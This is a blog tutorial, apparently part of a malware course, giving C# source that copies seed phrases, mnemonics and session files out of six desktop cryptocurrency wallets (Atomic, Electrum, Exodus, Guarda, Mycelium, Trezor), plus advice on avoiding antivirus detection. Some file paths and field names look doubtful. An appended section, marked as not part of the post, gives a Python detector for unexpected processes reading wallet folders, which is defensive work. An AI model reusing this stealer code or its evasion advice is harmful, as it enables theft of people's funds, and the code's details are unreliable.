
Stealing Offline Crypto Wallets with Malware — Top 6 Popular + Source-Codes


highzum

Cryptocurrencies are becoming increasingly popular, with a rising number of people storing their digital assets in physical crypto wallets. These wallets, however, are excellent targets for attackers looking to steal bitcoin or other coins. In this lesson, we’ll demonstrate how to add functionality that can steal offline crypto wallets from popular services such as Atomic, Electrum, Exodus, and 3 more popular ones.

Topic 1: Atomic Wallet

Atomic Wallet is a well-known offline cryptocurrency wallet that supports over 500 different coins. Using the below source-code you can write a function that is capable of stealing Atomic Wallet passwords and gaining access to users’ crypto assets.
// atomic
// set the folder path to save session files and mnemonic phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "atomic", "Local Storage", "leveldb");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "LOCK*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the mnemonic phrase
string mnemonicPath = Path.Combine(walletPath, "mnemonic.json");
string mnemonicJson = File.ReadAllText(mnemonicPath);
dynamic mnemonic = Newtonsoft.Json.JsonConvert.DeserializeObject(mnemonicJson);
string mnemonicPhrase = mnemonic.mnemonic;

// save the mnemonic phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "mnemonic.txt"), mnemonicPhrase);

Topic 2: Electrum Wallet

Electrum is another well-known offline crypto wallet that has been in existence since 2011. Using the below source-code you can write a function that can steal Electrum Wallet passwords and access users’ crypto assets.
// electrum
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "electrum.lock");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "wallet_seed");
string seedPhrase = File.ReadAllText(seedPath);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Topic 3: Exodus Wallet

Exodus is an easy-to-use offline crypto wallet that supports over 100 cryptocurrencies. Using the below source-code you can write a function that can steal Exodus Wallet credentials and give you access to users’ digital assets.
// exodus
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Exodus");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "exodus.wallet");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.encseed;

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Topic 4: Other Crypto Wallets

There are numerous additional offline crypto wallets with significant credentials other than Atomic, Electrum, and Exodus. Using the below source-codes you can write a function that can steal passwords from other popular cryptocurrency wallets, allowing you to access even more digital assets.

A) Guarda

// guarda
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Guarda");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "mnemonic.key");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.mnemonic_phrase;

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

B) Mycelium

// mycelium
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Personal), "Mycelium", "wallets");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "keys", "masterseed");
byte[] seedBytes = File.ReadAllBytes(seedPath);
string seedPhrase = Encoding.UTF8.GetString(seedBytes);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

C) Trezor

// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "trezor", "wallets");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "seed.txt");
string seedPhrase = File.ReadAllText(seedPath);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Finally, I compiled all the topics of lesson 9 & it was detected by 3 out of 26 antivirus scans.
Remember: Don’t share your unencrypted assemblies or malware source with random antivirus scanners; use only those which are listed in the article given below to keep your malware undetected forever:
https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed

Conclusion

For attackers looking to steal important digital assets, stealing offline crypto wallets is a profitable technique. This class explained how to create malware that may be used to steal login information from well-known offline cryptocurrency wallets like Atomic, Electrum, and Exodus. With this information, you may create malware programs that are more effective and keep up with the most recent cybersecurity threats. Keep an eye out for our upcoming class when we’ll discuss creating a function that can capture account sessions.
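
From the defender's side, the file reads listed in this post are detectable. The following is an added example, not part of the original post: it flags any process other than the wallet application itself that touches the wallet data folders the post names under AppData, and raises severity when one process touches several wallets in a short span. The event shape is a constructed simplification of file-access audit records (for example Windows Security event 4663 with auditing enabled on those folders); the executable allowlist, the 60-second window and the sample events are assumptions.

```python
import ntpath
from collections import defaultdict

# Wallet data folders named in the post, as lower-cased profile-relative paths.
WALLET_DIRS = {
    "atomic": r"appdata\local\atomic\local storage\leveldb",
    "electrum": r"appdata\roaming\electrum",
    "exodus": r"appdata\roaming\exodus",
    "guarda": r"appdata\roaming\guarda",
}
# Assumed executable names of the wallets themselves; adjust to your fleet.
ALLOWED = {"atomic": {"atomic wallet.exe"}, "electrum": {"electrum.exe"},
           "exodus": {"exodus.exe"}, "guarda": {"guarda.exe"}}
WINDOW_SECONDS = 60  # assumed: several wallets touched inside this span -> high

def wallet_for(path):
    """Map an accessed path to the wallet whose data folder contains it."""
    p = path.lower() + "\\"
    for name, sub in WALLET_DIRS.items():
        if "\\" + sub + "\\" in p:
            return name
    return None

def detect(events):
    """Alert on processes other than the wallet itself touching wallet data."""
    hits = defaultdict(list)  # (host, pid, image) -> [(time, wallet)]
    for ev in events:
        wallet = wallet_for(ev["object"])
        if wallet and ntpath.basename(ev["image"]).lower() not in ALLOWED[wallet]:
            hits[(ev["host"], ev["pid"], ev["image"])].append((ev["time"], wallet))
    alerts = []
    for (host, pid, image), rows in sorted(hits.items()):
        times = [t for t, _ in rows]
        wallets = sorted({w for _, w in rows})
        burst = max(times) - min(times) <= WINDOW_SECONDS
        alerts.append({"host": host, "pid": pid, "image": image, "wallets": wallets,
                       "severity": "high" if len(wallets) > 1 and burst else "medium"})
    return alerts

def _ev(time, pid, image, obj, host="ws1"):
    return {"time": time, "host": host, "pid": pid, "image": image, "object": obj}

A = r"C:\Users\alice\AppData"  # constructed sample events below
SAMPLE_EVENTS = [
    _ev(100, 4120, r"C:\Program Files\Exodus\Exodus.exe", A + r"\Roaming\Exodus\exodus.wallet"),
    _ev(205, 7788, r"C:\Users\alice\Downloads\invoice.exe", A + r"\Roaming\Exodus\exodus.wallet"),
    _ev(206, 7788, r"C:\Users\alice\Downloads\invoice.exe", A + r"\Roaming\Electrum\wallets"),
    _ev(207, 7788, r"C:\Users\alice\Downloads\invoice.exe", A + r"\Local\atomic\Local Storage\leveldb\LOCK"),
    _ev(300, 900, r"C:\Tools\backup.exe", A + r"\Roaming\Guarda\config"),
]
```

A single unexpected reader of one wallet folder is rated medium because backup and sync tools produce it too; the multi-wallet burst is the pattern worth paging on.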
 